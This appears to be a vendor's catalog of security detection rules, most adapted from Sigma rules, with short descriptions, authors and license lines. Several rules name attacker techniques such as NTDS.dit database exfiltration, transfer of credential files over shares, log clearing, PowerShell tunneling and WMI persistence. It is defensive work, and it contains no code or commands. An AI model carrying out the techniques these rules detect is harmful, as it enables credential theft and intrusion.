Rule Suspicious In-Memory Module Execution Detects process access events by suspicious processes which have reflectively loaded libraries in their memory space. Based on the Suspicious In-Memory Module Execution Sigma rule by Perez Diego (@darkquassar), oscd.community, and Jonhnathan Ribeiro.

Used under Detection Rule License 1.1.

Rule Suspicious Linux Log Cleared Triggers on attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion. Based on the Clear Linux Logs Sigma rule by Ömer Günal, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Mac System Log Cleared Triggers when a local audit log is deleted. Based on the Indicator Removal on Host - Clear Mac System Logs Sigma rule by remotephone, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Microsoft OneNote Child Process Detects a suspicious child process spawned by Microsoft OneNote. Based on the Suspicious Microsoft OneNote Child Process Sigma rule by Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), and Elastic (idea).

Used under Detection Rule License 1.1.

Rule Suspicious NTDS Process Patterns Exfiltration Detects suspicious processes that write (copy) an Active Directory database (ntds.dit) file. Based on the NTDS.DIT Creation By Uncommon Process Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious NTDS Process Writes Detects suspicious process patterns used in NTDS.DIT exfiltration. Based on the Suspicious Process Patterns NTDS.DIT Exfil Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious New Instance of an Office COM Object Detects a Microsoft Office application creating an instance of one of the Office COM objects such as Word.Application, or Excel.Application. This can be used by malicious actors to create malicious Office documents with macros on the fly. Based on the Suspicious New Instance Of An Office COM Object by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Outbound SMTP Connections Detects potential exfiltration over SMTP protocol. Based on the Suspicious Outbound SMTP Connections Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious PowerShell Keywords Detects keywords that could indicate the use of some PowerShell exploitation framework. Based on the Potential Suspicious PowerShell Keywords Sigma rule by Florian Roth (Nextron Systems), Perez Diego (@darkquassar), and Tuan Le (NCSGroup).

Used under Detection Rule License 1.1.

Rule Suspicious Process Discovery With Get-Process Detects adversaries performing discovery to get the processes that are running on the local computer. Based on the Suspicious Process Discovery With Get-Process Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Process from Microsoft HTML Help Detects suspicious process spawned from Microsoft HTML Help. Based on the HTML Help HH.EXE Suspicious Child Process Sigma rule by Maxim Pavlunin, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Program Location with Network Connections Detects programs with network connections running in suspicious file system locations. Based on the Suspicious Program Location with Network Connections by Florian Roth.

Used under Detection Rule License 1.1.

Rule Suspicious Proxy Binary Execution Triggers when a system binary is executed from a proxy.
Rule Suspicious PsExec Activity Detects suspicious PsExec activity. Based on the Impacket PsExec Execution Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Rule Suspicious Remote Named Pipe Detects lateral movement and remote execution scenarios using newly observed named pipes accessed remotely. Based on the First Time Seen Remote Named Pipe Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Suspicious Scheduled Task Detects suspicious scheduled task creation or update events based on attributes such as paths or command line flags. Based on the Suspicious Scheduled Task Creation by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Suspicious Scripting in a WMI Consumer Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers. Based on the Suspicious Scripting in a WMI Consumer Sigma rule by Florian Roth (Nextron Systems), and Jonhnathan Ribeiro.

Used under Detection Rule License 1.1.

Rule Suspicious Subprocess from RazerInstaller Detects a suspicious subprocess spawned by RazerInstaller.exe. Based on the Suspicious RazerInstaller Explorer Subprocess Sigma rule by Florian Roth, and Maxime Thiebaut.

Used under Detection Rule License 1.1.

Rule Suspicious Svchost Execution Anomaly Detects svchost.exe executed without any CLI arguments, which is normally observed when a malicious process spawns svchost.exe and injects code into its memory space. Based on the Suspect Svchost Activity Sigma rule by David Burkett, and @signalblur.

Used under Detection Rule License 1.1.

Rule Suspicious TCP Tunnel Via PowerShell Script Detects PowerShell scripts that create sockets or listeners, which could be indicative of tunneling activity. Based on the Suspicious TCP Tunnel Via PowerShell Script Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Valid Accounts Logon Triggers when a suspicious login from a valid account is detected.
Rule Suspicious WMIC Execution Detects WMIC executing suspicious or recon commands. Based on the Suspicious WMIC Execution Sigma rule by Michael Haag, Florian Roth, juju4, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious WebDav Client Execution Detects exfiltration attempts or use of WebDav to launch code hosted on a WebDav Server. Based on the WebDav Client Execution Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule Symlink to passwd Created Detects a symlink created to /etc/passwd. Based on the Symlink Etc Passwd Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule System Owner or User Discovery (Linux) Detects system owner or user discovery activities. Based on the System Owner or User Discovery Sigma rule by Timur Zinniatullin, and oscd.community.

Used under Detection Rule License 1.1.

Rule System Owner or User Discovery (Windows) Detects system owner or user discovery activities. Based on the Local Accounts Discovery Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule System Time Discovery Activity Detects system time discovery activity.
Rule Token Impersonation via PowerShell Detects adversaries leveraging Windows API functions related to token impersonation or theft.
Rule Transferring Files with Credential Data via Network Shares Detects attempts to transfer files with well-known filenames, such as sensitive files with credential data, using network shares. Based on the Transferring Files with Credential Data via Network Shares Sigma rule by Teymur Kheirkhabarov and oscd.community.

Used under Detection Rule License 1.1.

Rule Turla Service Installed Triggers when a malicious service associated with a known APT is installed.
Rule UAC Remote Restrictions Disabled Detects a registry modification that allows remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Uncommon Process Spawned from HWP Detects uncommon processes spawning from Hangul Word Processor (Hanword). Based on the Suspicious HWP Sub Processes Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Unusual Child Process from Different Processes Detects unusual child processes spawned by a range of parent processes. Based on the Abused Debug Privilege by Arbitrary Parent Processes Sigma rule by Semanur Guneysu @semanurtg, and oscd.community.

Used under Detection Rule License 1.1.

Rule User Authenticating via Multiple Explicit Credentials Detects a user attempting to authenticate with multiple target users using explicit credentials.
Rule User Creation Abusing Fortinet Vulnerability Detects user creation through abuse of a Fortinet vulnerability. Based on the Fortinet APT group abuse on Windows (user) Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule VBA DLL Loaded Via Office Application Detects VB DLLs loaded by a Microsoft Office application, which could indicate the presence of VBA Macros. Based on the VBA DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule VirtualBox Driver Installed or Started Detects VirtualBox driver installation or a start of virtual machines. Based on the Detect Virtualbox Driver Installation OR Starting Of VMs Sigma rule by Janantha Marasinghe.

Used under Detection Rule License 1.1.

Rule Vulnerable Driver Loaded Triggers when a vulnerable driver is loaded. Based on the Windows Vulnerable Driver Loaded Sigma rule by Michael Haag, and Splunk.

Used under Detection Rule License 1.1.

Rule WMI Event Consumer Persistence Detects WMI command line event consumers. Based on the WMI Persistence - Command Line Event Consumer Sigma rule by Thomas Patzke.

Used under Detection Rule License 1.1.

Rule WScript or CScript Dropping File Detects a file ending in jse, vbe, js, vba, or vbs being written by cscript.exe or wscript.exe. Based on the WScript or CScript Dropper - File Sigma rule by Tim Shelton.

Used under Detection Rule License 1.1.

Rule Windows Event Logging Disabled Via Registry Detects tampering with the 'Enabled' registry key in order to disable Windows logging of a Windows event channel. Based on the Disable Windows Event Logging Via Registry Sigma rule by frack113, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Windows Registry Trust Record Modification Detects Windows registry trust record modification. Based on the Windows Registry Trust Record Modification Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.
